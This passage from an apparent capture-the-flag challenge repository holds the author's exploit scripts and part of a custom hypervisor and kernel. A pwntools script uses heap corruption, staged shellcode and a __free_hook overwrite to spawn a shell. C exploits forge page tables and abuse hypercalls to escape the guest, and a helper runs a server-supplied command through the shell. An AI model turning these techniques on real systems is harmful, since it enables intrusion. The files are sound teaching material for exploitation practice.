'DEBUG', local = 'PROC', remote = 'SOCKET') 14 | env.set_item('target', debug = {'argv':[bin_file]+args, 'aslr':False}, \ 15 | local = {'argv':['./pow.py', 'hoge'], 'stderr':open('/dev/null', 'w+')}, \ 16 | remote = {'host':'localhost', 'port':16359}) 17 | env.set_item('libc', debug = None, \ 18 | local = None, \ 19 | remote = 'libc-2.27.so') 20 | env.select() 21 | 22 | libcenv = Environment('old', 'new') 23 | libcenv.set_item('arena_top', old = 0x58, new = 0x60) 24 | 25 | #========== 26 | 27 | payload_elf = open('exploit.elf').read() 28 | 29 | chdir('./release') 30 | binf = ELF(bin_file) 31 | 32 | libc = ELF(env.libc) if env.libc else binf.libc 33 | offset_libc_freehook = libc.symbols['__free_hook'] 34 | offset_libc_malloc_hook = libc.symbols['__malloc_hook'] 35 | offset_libc_mainarena = offset_libc_malloc_hook + 0x10 36 | 37 | libc_name = path.basename(path.realpath(libc.path)) 38 | libcenv.select('new' if float(libc_name[5:5+4]) >= 2.27 else 'old') 39 | offset_mainarena_top = libcenv.arena_top 40 | 41 | vm_binf = ELF(args[1]) 42 | addr_vm_memo = vm_binf.symbols['memo'] 43 | addr_vm_heap = 0x605000 44 | addr_vm_memo_buf = 0x7fff1ff000 45 | addr_vm_stack = 0x7ffffffff0 46 | 47 | #========== 48 | 49 | def attack(conn): 50 | if not env.check('debug'): 51 | if env.check('local'): 52 | conn.sendlineafter('\n', 'hoge') 53 | else: 54 | solve_pow(conn) 55 | conn.sendlineafter('> ', 'flag2.txt'+' a'*0x100) 56 | 57 | exploit_memo(conn, payload_elf, 0x150) 58 | 59 | flag1 = get_flag1(conn) 60 | success("flag1 : {}".format(flag1)) 61 | 62 | flag2 = get_flag2(conn) 63 | success("flag2 : {}".format(flag2)) 64 | 65 | get_shell(conn) 66 | 67 | def solve_pow(conn): 68 | import subprocess 69 | 70 | cmd = conn.recvuntil('\n', drop=True) 71 | info(cmd) 72 | 73 | ret = subprocess.Popen(cmd, stdout=subprocess.PIPE, shell=True).communicate()[0].strip() 74 | success('hash : {}'.format(ret)) 75 | conn.sendline(ret) 76 | 77 | def get_flag1(conn): 78 | conn.recvuntil('first flag : ') 79 | return conn.recvuntil('\n') 80 | 81 | def get_flag2(conn): 82 | conn.recvuntil('ring0\n') 83 | return conn.recv(0x50).strip("\x00").split(' : ')[1] 84 | 85 | def get_shell(conn): 86 | conn.send(p64(offset_libc_mainarena)) 87 | conn.send(p64(offset_libc_freehook)) 88 | 89 | conn.send(p64(offset_mainarena_top)) 90 | 91 | addr_heap_top = u64(conn.recv(8)) 92 | info('addr_heap_top = 0x{:08x}'.format(addr_heap_top)) 93 | 94 | conn.recv(8) 95 | 96 | addr_libc_mainarena = u64(conn.recv(8)) - offset_mainarena_top 97 | libc.address = addr_libc_mainarena - offset_libc_mainarena 98 | addr_libc_system = libc.sep_function['system'] 99 | info('addr_libc_base = 0x{:08x}'.format(libc.address)) 100 | 101 | addr_vmmem = libc.address - 0x400000 102 | info('addr_vmmem = 0x{:08x}'.format(addr_vmmem)) 103 | 104 | conn.send(p64(addr_libc_system)) 105 | conn.send(p64(u(p((addr_heap_top - addr_vmmem) & ~0xfffff)) | 0x83)) 106 | conn.send(p64(((addr_heap_top - addr_vmmem) & 0xfffff) - 0x30)) 107 | conn.send('/bin/sh\x00') 108 | 109 | conn.interactive() 110 | 111 | def exploit_memo(conn, payload, ep): 112 | payload_size = 0x2000 113 | 114 | shellcode2 = shellcraft.mmap_rwx(payload_size) 115 | shellcode2 += shellcraft.read(0, 'rax', payload_size) 116 | shellcode2 += ''' 117 | add rsi, {} 118 | jmp rsi 119 | '''.format(ep) 120 | shellcode2 = asm(shellcode2) 121 | 122 | shellcode1 = 'lea rsi, [rip]' 123 | shellcode1 += shellcraft.read(0, None, len(shellcode2)+0x10) 124 | shellcode1 = asm(shellcode1) 125 | 126 | memo = Memo(conn) 127 | 128 | 
memo.alloc('a'*0x28) # 0 129 | memo.alloc('b') # 1 130 | memo.alloc('c'*0x8+p64(0x31)+p64(addr_vm_memo_buf+0x10-8)+p64(addr_vm_memo_buf+0x10)) # 2 131 | memo.alloc(p64(0x30)+p64(0x20)) # 3 132 | memo.alloc(shellcode1) # 4 133 | memo.alloc(p64(0xdeadbeef)+p64(0)+p64(addr_vm_stack-0x8)+p64(0)) # 5 134 | 135 | memo.edit(0, 'A'*0x28+chr(0x41)) 136 | memo.delete(1) 137 | 138 | memo.alloc('b') # 1 139 | memo.edit(2, p64(addr_vm_memo+1)[:len(p64(addr_vm_heap).rstrip('\x00'))]) 140 | sleep(0.1) 141 | memo.edit(1, p64(addr_vm_heap + 0x1100)[1:len(p64(addr_vm_memo_buf).rstrip('\x00'))]) 142 | sleep(0.1) 143 | memo.edit(2, p64(addr_vm_heap + 0x10e0)) 144 | 145 | sleep(0.1) 146 | conn.send('\x90'*0x10 + shellcode2) 147 | sleep(0.5) 148 | conn.send(payload) 149 | 150 | class Memo: 151 | def __init__(self, conn): 152 | self.recvuntil = conn.recvuntil 153 | self.recv = conn.recv 154 | self.sendline = conn.sendline 155 | self.send = conn.send 156 | self.sendlineafter = conn.sendlineafter 157 | self.sendafter = conn.sendafter 158 | 159 | def alloc(self, data): 160 | self.sendlineafter('> ', '1') 161 | self.sendafter('memo > ', data) 162 | 163 | def edit(self, idx, data): 164 | self.sendlineafter('> ', '2') 165 | self.sendlineafter('id > ', str(idx)) 166 | self.sendafter('memo > ', data) 167 | 168 | def delete(self, idx): 169 | self.sendlineafter('> ', '3') 170 | self.sendlineafter('id > ', str(idx)) 171 | 172 | #========== 173 | 174 | if __name__=='__main__': 175 | conn = communicate(env.mode, **env.target) 176 | attack(conn) 177 | 178 | #========== 179 | -------------------------------------------------------------------------------- /exploit/part/exploit_lv1.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "../libc/syscall.h" 4 | 5 | #define NR_getflag 4296 6 | 7 | int main(void){ 8 | char *flag; 9 | 10 | puts("now exploiting!"); 11 | 12 | syscall(flag, NR_getflag); 13 | if((long)flag < 0){ 14 | puts("failed to get flag."); 15 | return -1; 16 | } 17 | 18 | mprotect(flag, 0x1000, PROT_READ); 19 | puts(flag); 20 | 21 | return 0; 22 | } 23 | -------------------------------------------------------------------------------- /exploit/part/exploit_lv2.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include "utils/hypercall.h" 7 | 8 | #define PDE64_PRESENT 1 9 | #define PDE64_RW (1U << 1) 10 | #define PDE64_USER (1U << 2) 11 | #define PDE64_PS (1U << 7) 12 | 13 | void syscall_handler(void); 14 | 15 | int main(void){ 16 | void *addr; 17 | uint64_t *pt; 18 | 19 | puts("now exploiting!"); 20 | 21 | addr = mmap((void*)0x80000000, 0x3000, PROT_READ|PROT_WRITE, 0, -1, 0); 22 | munmap(addr, 0x1000); 23 | mmap((void*)0xc0000000, 0x1000, PROT_READ|PROT_WRITE, 0, -1, 0); 24 | 25 | pt = addr + 0x2000; 26 | for(int i = 0; i<2; i++) 27 | pt[i] = PDE64_PRESENT | PDE64_RW | PDE64_USER | (0x1000*i); 28 | memcpy((void*)0xc0001389, &syscall_handler, 0x800); 29 | 30 | asm("syscall"); 31 | 32 | return 0; 33 | } 34 | 35 | void syscall_handler(void){ 36 | char *flag; 37 | 38 | flag = hc_load_module(2, 0, 0, 0x1000); 39 | hc_write(flag + 0x8040000000, 0x20, 0); 40 | 41 | asm("hlt"); 42 | } 43 | -------------------------------------------------------------------------------- /exploit/part/exploit_lv3.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include 
"utils/hypercall.h" 7 | 8 | #define PDE64_PRESENT 1 9 | #define PDE64_RW (1U << 1) 10 | #define PDE64_USER (1U << 2) 11 | #define PDE64_PS (1U << 7) 12 | 13 | void syscall_handler(void); 14 | 15 | int main(void){ 16 | void *addr; 17 | uint64_t *pd, *pt; 18 | 19 | puts("now exploiting!"); 20 | 21 | addr = mmap((void*)0x80000000, 0x3000, PROT_READ|PROT_WRITE, 0, -1, 0); 22 | munmap(addr, 0x1000); 23 | mmap((void*)0xc0000000, 0x1000, PROT_READ|PROT_WRITE, 0, -1, 0); 24 | 25 | pd = addr + 0x1000; 26 | pt = addr + 0x2000; 27 | 28 | for(int i = 0; i<2; i++) // pd[0] 29 | pt[i] = PDE64_PRESENT | PDE64_RW | PDE64_USER | (0x1000*i); 30 | for(int i = 0; i<3; i++) 31 | pd[8+i] = PDE64_PRESENT | PDE64_RW | PDE64_PS | (0x400000 + 0x200000*i); 32 | 33 | memcpy((void*)0xc0001389, &syscall_handler, 0x800); 34 | 35 | asm("syscall"); 36 | 37 | return 0; 38 | } 39 | 40 | void syscall_handler(void){ 41 | void *libc = (void*)0xc1000000; 42 | void *main_arena = libc + 0x3c4b20; 43 | uint64_t *free_hook = libc + 0x3c67a8; 44 | 45 | char *heap = (void*)0xc2000000; 46 | 47 | uint64_t *pd = (uint64_t*)(0x8040000000 + 0x23000); 48 | 49 | hc_write(main_arena + 0x58, 0x18, 0); 50 | hc_read(free_hook, 0x8, 0); 51 | hc_read(&pd[16], 0x8, 0); 52 | 53 | void *p[2]; 54 | p[0] = hc_malloc(0, 0x1000); 55 | p[1] = hc_malloc(0, 0x1000); 56 | 57 | hc_free(p[0]); 58 | hc_read(heap+0x5b0, 0x8, 0); 59 | hc_free(p[1]); 60 | 61 | asm("hlt"); 62 | } 63 | -------------------------------------------------------------------------------- /exploit/part/exploit_note.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python 2 | from sc_expwn import * # https://raw.githubusercontent.com/shift-crops/sc_expwn/master/sc_expwn.py 3 | 4 | bin_file = '../bin/memo-static.elf' 5 | context(os = 'linux', arch = 'amd64') 6 | context.log_level = 'debug' 7 | 8 | #========== 9 | 10 | env = Environment('debug', 'local', 'remote') 11 | env.set_item('mode', debug = 'DEBUG', local = 'PROC', remote = 'SOCKET') 12 | env.set_item('target', debug = {'argv':[bin_file], 'aslr':False}, \ 13 | local = {'argv':[bin_file]}, \ 14 | remote = {'host':'target.com', 'port':4296}) 15 | env.select('debug') 16 | 17 | #========== 18 | 19 | binf = ELF(bin_file) 20 | 21 | addr_heap = 0x605000 22 | 23 | addr_memo = binf.symbols['memo'] 24 | addr_memo_buf = 0x7ffff7ff9000 25 | 26 | addr_stack = 0x7fffffffda80 27 | 28 | #========== 29 | 30 | def attack(conn): 31 | memo = Memo(conn) 32 | 33 | shellcode2 = shellcraft.mmap_rwx(0x2000) 34 | shellcode2 += shellcraft.read(0, 'rax', 0x2000) 35 | shellcode2 += ''' 36 | add rsi, 0x150 37 | jmp rsi 38 | ''' 39 | shellcode2 = asm(shellcode2) 40 | 41 | shellcode1 = 'lea rsi, [rip]' 42 | shellcode1 += shellcraft.read(0, None, len(shellcode2)+0x10) 43 | shellcode1 = asm(shellcode1) 44 | 45 | memo.alloc('a'*0x28) # 0 46 | memo.alloc('b') # 1 47 | memo.alloc('c'*0x8+p64(0x31)+p64(addr_memo_buf+0x10-8)+p64(addr_memo_buf+0x10)) # 2 48 | memo.alloc(p64(0x30)+p64(0x20)) # 3 49 | memo.alloc(shellcode1) # 4 50 | memo.alloc(p64(0xdeadbeef)+p64(0)+p64(addr_stack-0x8)+p64(0)) # 5 51 | 52 | memo.edit(0, 'A'*0x28+chr(0x41)) 53 | memo.delete(1) 54 | 55 | memo.alloc('b') # 1 56 | memo.edit(2, p64(addr_memo+1)[:len(p64(addr_heap).rstrip('\x00'))]) 57 | memo.edit(1, p64(addr_heap + 0x1100)[1:len(p64(addr_memo_buf).rstrip('\x00'))]) 58 | memo.edit(2, p64(addr_heap + 0x10e0)) 59 | 60 | conn.send('\x90'*0x10 + shellcode2) 61 | conn.send(open('exploit.elf').read()) 62 | 63 | class Memo: 64 | def __init__(self, 
conn): 65 | self.recvuntil = conn.recvuntil 66 | self.recv = conn.recv 67 | self.sendline = conn.sendline 68 | self.send = conn.send 69 | self.sendlineafter = conn.sendlineafter 70 | self.sendafter = conn.sendafter 71 | 72 | def alloc(self, data): 73 | self.sendlineafter('> ', '1') 74 | self.sendafter('memo > ', data) 75 | 76 | def edit(self, idx, data): 77 | self.sendlineafter('> ', '2') 78 | self.sendlineafter('id > ', str(idx)) 79 | self.sendafter('memo > ', data) 80 | 81 | def delete(self, idx): 82 | self.sendlineafter('> ', '3') 83 | self.sendlineafter('id > ', str(idx)) 84 | 85 | #========== 86 | 87 | if __name__=='__main__': 88 | conn = communicate(env.mode, **env.target) 89 | attack(conn) 90 | conn.interactive() 91 | 92 | #========== 93 | -------------------------------------------------------------------------------- /exploit/release: -------------------------------------------------------------------------------- 1 | ../release -------------------------------------------------------------------------------- /exploit/start.s: -------------------------------------------------------------------------------- 1 | global _start 2 | extern main, exit 3 | 4 | _start: 5 | call main 6 | mov rdi, rax 7 | call exit 8 | hlt: 9 | hlt 10 | jmp hlt 11 | -------------------------------------------------------------------------------- /exploit/utils/Makefile: -------------------------------------------------------------------------------- 1 | AS := nasm 2 | 3 | TARGET := utils.a 4 | CSRCS := $(wildcard *.c) 5 | SSRCS := $(wildcard *.s) 6 | 7 | OBJS := $(CSRCS:.c=.o) $(SSRCS:.s=.o) 8 | DEPS := $(CSRCS:.c=.d) 9 | 10 | ifndef 11 | CFLAGS := -Wall -masm=intel -fPIE -fno-stack-protector 12 | endif 13 | 14 | .PHONY: all 15 | all: $(TARGET) 16 | 17 | -include $(DEPS) 18 | 19 | $(TARGET): $(OBJS) 20 | $(AR) rcs $@ $^ 21 | 22 | %.o: %.c 23 | $(CC) $(CFLAGS) -c -MMD -MP $< 24 | 25 | %.o: %.s 26 | $(AS) -f elf64 $^ 27 | 28 | .PHONY: clean 29 | clean: 30 | $(RM) $(DEPS) $(OBJS) $(TARGET) 31 | -------------------------------------------------------------------------------- /exploit/utils/exit.s: -------------------------------------------------------------------------------- 1 | global exit 2 | 3 | exit: 4 | mov rax, 60 5 | syscall 6 | -------------------------------------------------------------------------------- /exploit/utils/hypercall.h: -------------------------------------------------------------------------------- 1 | #ifndef _HYPERCALL_H 2 | #define _HYPERCALL_H 3 | 4 | unsigned int hc_read(void *buf, unsigned long size, int user); 5 | unsigned int hc_write(void *buf, unsigned long size, int user); 6 | 7 | void *hc_malloc(void *addr, unsigned long size); 8 | int hc_free(void *addr); 9 | 10 | void *hc_load_module(int id, void *addr, unsigned long offset, unsigned long size); 11 | 12 | #endif 13 | -------------------------------------------------------------------------------- /exploit/utils/hypercall.s: -------------------------------------------------------------------------------- 1 | global hc_read, hc_write 2 | global hc_malloc, hc_free 3 | global hc_load_module 4 | 5 | hc_read: 6 | mov rax, 0x10 7 | mov rbx, rdi 8 | mov rcx, rsi 9 | vmmcall 10 | ret 11 | 12 | hc_write: 13 | mov rax, 0x11 14 | mov rbx, rdi 15 | mov rcx, rsi 16 | vmmcall 17 | ret 18 | 19 | hc_malloc: 20 | mov rax, 0x21 21 | mov rbx, rdi 22 | mov rcx, rsi 23 | vmmcall 24 | ret 25 | 26 | hc_free: 27 | mov rax, 0x22 28 | mov rbx, rdi 29 | vmmcall 30 | ret 31 | 32 | hc_load_module: 33 | mov rax, 0x30 34 | mov rbx, rdi 35 | xchg rcx, rsi 
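	; editor's note (ABI inferred by comparing this stub with kernel/service/hypercall.s,
	; not documented in the original): rax = hypercall number (0x30 = load_module),
	; rbx = module id, rcx = guest physical address (0 lets the host allocate),
	; rdx = file offset, rsi = size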
36 | vmmcall 37 | ret 38 | -------------------------------------------------------------------------------- /exploit/utils/io.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "syscall.h" 5 | 6 | ssize_t read(int fd, void *buf, size_t count){ 7 | ssize_t n; 8 | 9 | if(!count) 10 | return 0; 11 | 12 | if (fd < 0 || buf == NULL) 13 | return -1; 14 | 15 | syscall(n, NR_read); 16 | 17 | return n; 18 | } 19 | 20 | ssize_t write(int fd, void *buf, size_t count){ 21 | ssize_t n; 22 | 23 | if(!count) 24 | return 0; 25 | 26 | if (fd < 0 || buf == NULL) 27 | return -1; 28 | 29 | syscall(n, NR_write); 30 | 31 | return n; 32 | } 33 | -------------------------------------------------------------------------------- /exploit/utils/mmap.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include "syscall.h" 4 | 5 | void *mmap(void *addr, size_t length, int prot, int flags, int fd, off_t offset){ 6 | void *mem; 7 | 8 | syscall6(mem, NR_mmap, addr, length, prot, flags, fd, offset); 9 | 10 | return mem; 11 | } 12 | 13 | int mprotect(void *addr, size_t len, int prot){ 14 | long res; 15 | 16 | syscall(res, NR_mprotect); 17 | 18 | return res; 19 | } 20 | 21 | int munmap(void *addr, size_t length){ 22 | long res; 23 | 24 | syscall(res, NR_munmap); 25 | 26 | return res; 27 | } 28 | -------------------------------------------------------------------------------- /exploit/utils/puts.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | int puts(const char *s){ 5 | int n; 6 | 7 | if((n = write(1, s, strlen(s)))) 8 | write(1, "\n", 1); 9 | 10 | return n; 11 | } 12 | 13 | -------------------------------------------------------------------------------- /exploit/utils/string.c: -------------------------------------------------------------------------------- 1 | #include 2 | 3 | void *memset(void *s, int c, size_t n){ 4 | for(int i=0; i 2 | #include 3 | #include "elf/elf.h" 4 | #include "service/hypercall.h" 5 | #include "memory/memory.h" 6 | #include "memory/usermem.h" 7 | 8 | uint64_t load_elf(void){ 9 | uint64_t ehdr_phys; 10 | uint64_t ret = -1; 11 | 12 | if((ehdr_phys = (uint64_t)hc_load_module(0, 0, 0x1000)) == -1) 13 | return -1; 14 | Elf64_Ehdr *ehdr = (Elf64_Ehdr *)(ehdr_phys+STRAIGHT_BASE); 15 | 16 | if (!(ehdr->e_ident[EI_MAG0] == ELFMAG0 && ehdr->e_ident[EI_MAG1] == ELFMAG1 && \ 17 | ehdr->e_ident[EI_MAG2] == ELFMAG2 && ehdr->e_ident[EI_MAG3] == ELFMAG3 )) 18 | goto end; 19 | 20 | if (ehdr->e_ident[EI_CLASS] != ELFCLASS64) 21 | goto end; 22 | 23 | if (ehdr->e_ident[EI_DATA] != ELFDATA2LSB) 24 | goto end; 25 | 26 | for(int i = 0; i < ehdr->e_phnum; i++) { 27 | Elf64_Phdr *phdr = (Elf64_Phdr *)((uint64_t)ehdr + ehdr->e_phoff + ehdr->e_phentsize * i); 28 | uint64_t entry_phys; 29 | 30 | if(phdr->p_type != PT_LOAD) 31 | continue; 32 | 33 | if((entry_phys = (uint64_t)hc_load_module(0, phdr->p_offset, phdr->p_filesz)) == -1) 34 | goto end; 35 | 36 | uint16_t flags = phdr->p_flags; 37 | uint64_t memsz = (phdr->p_memsz + 0x1000-1) & ~0xfff; 38 | mmap_in_user(phdr->p_vaddr, entry_phys, memsz, \ 39 | (flags & PF_R ? PROT_READ : 0) | (flags & PF_W ? PROT_WRITE : 0) | (flags & PF_X ? 
PROT_EXEC : 0)); 40 | 41 | if(phdr->p_vaddr + memsz > brk) 42 | brk = phdr->p_vaddr + memsz; 43 | } 44 | 45 | ret = ehdr->e_entry; 46 | end: 47 | hc_free((void*)ehdr_phys, 0x1000); 48 | return ret; 49 | } 50 | -------------------------------------------------------------------------------- /kernel/elf/elf.h: -------------------------------------------------------------------------------- 1 | #ifndef _ELF_H 2 | #define _ELF_H 3 | 4 | uint64_t load_elf(void); 5 | 6 | #endif 7 | -------------------------------------------------------------------------------- /kernel/kernel.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "bits.h" 3 | #include "elf/elf.h" 4 | #include "memory/sysmem.h" 5 | #include "memory/usermem.h" 6 | #include "service/switch.h" 7 | 8 | int kernel_main(void){ 9 | uint64_t entry; 10 | 11 | if((init_pagetable()) < 0) 12 | return -1; 13 | // --- new paging enabled --- 14 | if(init_gdt() < 0) 15 | return -1; 16 | 17 | asm("lea rdi, [rip + syscall_handler]\n" 18 | "call set_handler"); 19 | if(prepare_user() < 0) 20 | return -1; 21 | 22 | if((entry = load_elf()) == -1) 23 | return -1; 24 | 25 | switch_user(entry, 0x7ffffffff0); 26 | 27 | return 0; 28 | } 29 | -------------------------------------------------------------------------------- /kernel/memory/Makefile: -------------------------------------------------------------------------------- 1 | TARGET := memory.a 2 | 3 | include ../template.mk 4 | -------------------------------------------------------------------------------- /kernel/memory/memory.h: -------------------------------------------------------------------------------- 1 | #ifndef _MEMORY_H 2 | #define _MEMORY_H 3 | 4 | #define STRAIGHT_BASE 0x8040000000 5 | 6 | uint64_t kernel_stack; 7 | 8 | #endif 9 | -------------------------------------------------------------------------------- /kernel/memory/sysmem.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include "bits.h" 3 | #include "memory/memory.h" 4 | #include "service/hypercall.h" 5 | 6 | /* 7 | 0x8000000000 ~ 0xffffffffff : Kernel 8 | 0x8000000000 ~ 0x8000004000 : binary 1:0:0:0-3 9 | 0x8000200000 ~ 0x8000204000 : bss 1:0:1:0-3 10 | 0x8040000000 ~ 0x807ffff000 : straight 1:1:0-511:0-511 11 | 0xffffffc000 ~ 0xfffffff000 : stack 1:511:511:508-511 12 | */ 13 | 14 | int init_pagetable(void){ 15 | uint64_t mem_size; 16 | uint64_t *pml4, *pdpt, *pd, *pt; 17 | uint64_t bss_phys, cr3; 18 | 19 | mem_size = hc_mem_total(); 20 | asm volatile ("mov %0, cr3" : "=r"(cr3)); 21 | 22 | if((uint64_t)(pml4 = hc_malloc(0, 0x1000)) == -1) 23 | return -1; 24 | 25 | if((uint64_t)(pdpt = hc_malloc(0, 0x1000)) == -1) 26 | return -1; 27 | pml4[0] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pdpt; 28 | pml4[1] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pdpt; 29 | 30 | if((uint64_t)(pd = hc_malloc(0, 0x1000*3)) == -1) 31 | return -1; 32 | pdpt[0] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pd; 33 | 34 | uint16_t n_pt = (mem_size>>21) + (mem_size & ((1<<21)-1)) ? 
1 : 0; 35 | if((uint64_t)(pt = hc_malloc(0, 0x1000*(2+n_pt+1))) == -1) 36 | return -1; 37 | pd[0] = PDE64_PRESENT | PDE64_GLOBAL | (uint64_t)pt; 38 | for(int i = 0; i < 4; i++) 39 | pt[i] = PDE64_PRESENT | PDE64_GLOBAL | (i<<12); 40 | 41 | pt += 512; 42 | if((bss_phys = (uint64_t)hc_malloc(0, 0x1000*4)) == -1) 43 | return -1; 44 | pd[1] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pt; 45 | for(int i = 0; i < 4; i++) 46 | pt[i] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (bss_phys+(i<<12)); 47 | 48 | pd += 512; 49 | pt += 512; 50 | 51 | pdpt[1] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pd; 52 | for(int i = 0; i < n_pt; i++, pt += 512){ 53 | pd[i] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pt; 54 | uint16_t n_page = (mem_size>>21)-i > 0 ? 512 : (mem_size & ((1<<21)-1))>>12; 55 | for(int j = 0; j < n_page; j++) 56 | pt[j] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | ((i<<21)|(j<<12)); 57 | } 58 | 59 | pd += 512; 60 | 61 | pdpt[511] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pd; 62 | pd[511] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (uint64_t)pt; 63 | for(int i = 1; i < 5; i++) 64 | pt[512-i] = PDE64_PRESENT | PDE64_RW | PDE64_GLOBAL | (kernel_stack-(i<<12)); 65 | 66 | asm volatile ( 67 | "mov rdx, 0x8000000000\r\n" 68 | "add rdx, [rbp+0x8]\r\n" 69 | "mov [rbp+0x8], rdx\r\n" 70 | 71 | "mov rdx, 0xfffffff000\r\n" 72 | "mov rcx, [rbp]\r\n" 73 | "and rcx, 0xfff\r\n" 74 | "or rcx, rdx\r\n" 75 | "mov [rbp], rcx\r\n" 76 | 77 | "and rbp, 0xfff\r\n" 78 | "add rbp, rdx\r\n" 79 | 80 | "mov cr3, %0\r\n" 81 | ::"r"(pml4)); 82 | 83 | return 0; 84 | } 85 | 86 | int init_gdt(void){ 87 | #define tsdp(type, s, dpl, p) (type | (s << 4) | (dpl << 5) | (p << 7)) 88 | #define saldg(slh, avl, l, db, g) (slh | (avl << 4) | (l << 5) | (db << 6) | (g << 7)) 89 | 90 | struct gdtr { 91 | uint16_t size; 92 | struct gdt *base __attribute__((packed)); 93 | } gdtr; 94 | 95 | struct gdt { 96 | uint16_t seg_lim_low; 97 | uint16_t base_low; 98 | uint8_t base_mid; 99 | uint8_t tsdp; 100 | uint8_t saldg; 101 | uint8_t base_high; 102 | } *gdtptr; 103 | 104 | if((uint64_t)(gdtptr = (struct gdt*)(hc_malloc(0, 0x1000)+STRAIGHT_BASE)) == -1) 105 | return -1; 106 | gdtr.size = sizeof(struct gdt)*6; 107 | gdtr.base = gdtptr; 108 | 109 | struct gdt gdt = { 110 | .seg_lim_low = 0xffff, 111 | .base_low = 0x0, 112 | .base_mid = 0x0, 113 | .tsdp = tsdp(11, 1, 0, 1), 114 | .saldg = saldg(15, 0, 1, 0, 1), 115 | .base_high = 0x0, 116 | }; 117 | gdtptr[2] = gdt; 118 | 119 | gdt.tsdp = tsdp(3, 1, 0, 1); 120 | gdtptr[3] = gdt; 121 | 122 | gdt.tsdp = tsdp(11, 1, 3, 1); 123 | gdtptr[4] = gdt; 124 | 125 | gdt.tsdp = tsdp(3, 1, 3, 1); 126 | gdtptr[5] = gdt; 127 | 128 | asm volatile ( 129 | "cli\r\n" 130 | "lgdt [%0]\r\n" 131 | "sti\r\n" 132 | ::"r"(&gdtr)); 133 | 134 | return 0; 135 | } 136 | -------------------------------------------------------------------------------- /kernel/memory/sysmem.h: -------------------------------------------------------------------------------- 1 | #ifndef _SYSMEM_H 2 | #define _SYSMEM_H 3 | 4 | int init_pagetable(void); 5 | int init_gdt(void); 6 | 7 | #endif 8 | -------------------------------------------------------------------------------- /kernel/memory/usermem.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include "bits.h" 5 | #include "memory/memory.h" 6 | #include "memory/usermem.h" 7 | #include "service/hypercall.h" 8 | 9 | /* 10 | 0x0000000000 ~ 0x7fffffffff : User 11 | 0x0000400000 ~ 
0x0000403000 : binary 0:0:2:0-2 12 | 0x0000603000 ~ 0x0000604000 : bss 0:0:3:3 13 | 0x0000608000 ~ 0x0000610000 : heap 0:0:3:8-16 14 | 0x7fffffc000 ~ 0x7ffffff000 : stack 0:511:511:508-511 15 | */ 16 | 17 | int prepare_user(void){ 18 | uint64_t pml4_phys, pdpt_phys, pd_phys, pt_phys, page_phys; 19 | uint64_t *pml4, *pdpt, *pd, *pt; 20 | 21 | asm volatile ("mov %0, cr3":"=r"(pml4_phys)); 22 | pml4 = (uint64_t*)(pml4_phys+STRAIGHT_BASE); 23 | 24 | if((pdpt_phys = (uint64_t)hc_malloc(0, 0x1000)) == -1) 25 | return -1; 26 | pdpt = (uint64_t*)(pdpt_phys+STRAIGHT_BASE); 27 | pml4[0] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pdpt_phys; 28 | 29 | if((pd_phys = (uint64_t)hc_malloc(0, 0x1000)) == -1) 30 | return -1; 31 | pd = (uint64_t*)(pd_phys+STRAIGHT_BASE); 32 | pdpt[511] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pd_phys; 33 | 34 | if((pt_phys = (uint64_t)hc_malloc(0, 0x1000)) == -1) 35 | return -1; 36 | pt = (uint64_t*)(pt_phys+STRAIGHT_BASE); 37 | pd[511] = PDE64_PRESENT | PDE64_RW | PDE64_USER | pt_phys; 38 | 39 | // stack 40 | if((page_phys = (uint64_t)hc_malloc(0, 0x1000*4)) == -1) 41 | return -1; 42 | for(int i = 0; i < 4; i++) 43 | pt[512-4+i] = PDE64_PRESENT | PDE64_RW | PDE64_USER | (page_phys+(i<<12)); 44 | 45 | return 0; 46 | } 47 | 48 | uint64_t mmap_user(uint64_t vaddr, size_t length, int prot){ 49 | uint64_t page_phys; 50 | uint16_t pages = length>>12; 51 | 52 | uint64_t ret = -1; 53 | 54 | if((page_phys = (uint64_t)hc_malloc(0, pages<<12)) == -1) 55 | return -1; 56 | if((ret = mmap_in_user(vaddr, page_phys, length, prot)) == -1) 57 | hc_free((void*)page_phys, pages<<12); 58 | 59 | return ret; 60 | } 61 | 62 | static uint64_t map_bottom; 63 | static uint64_t mappable_size(uint64_t vaddr, size_t length); 64 | static uint64_t do_mmap_in_user(uint64_t vaddr, uint64_t paddr, size_t length, int prot); 65 | 66 | uint64_t mmap_in_user(uint64_t vaddr, uint64_t paddr, size_t length, int prot){ 67 | if(vaddr&0xfff || paddr&0xfff || length&0xfff) 68 | return -1; 69 | 70 | if(!map_bottom) 71 | map_bottom = 0x7fff200000; 72 | 73 | if(vaddr){ 74 | if(mappable_size(vaddr, length) < length) 75 | return -1; 76 | } 77 | else { 78 | uint64_t ms; 79 | do { 80 | if(!(ms = mappable_size(map_bottom - length, length))) 81 | return -1; 82 | if(ms < length) 83 | map_bottom -= length - ms; 84 | } while(ms < length); 85 | 86 | vaddr = map_bottom - length; 87 | } 88 | 89 | return do_mmap_in_user(vaddr, paddr, length, prot); 90 | } 91 | 92 | static uint64_t mappable_size(uint64_t vaddr, size_t length){ 93 | uint64_t pml4_phys, pdpt_phys, pd_phys, pt_phys; 94 | uint64_t *pml4, *pdpt, *pd, *pt; 95 | 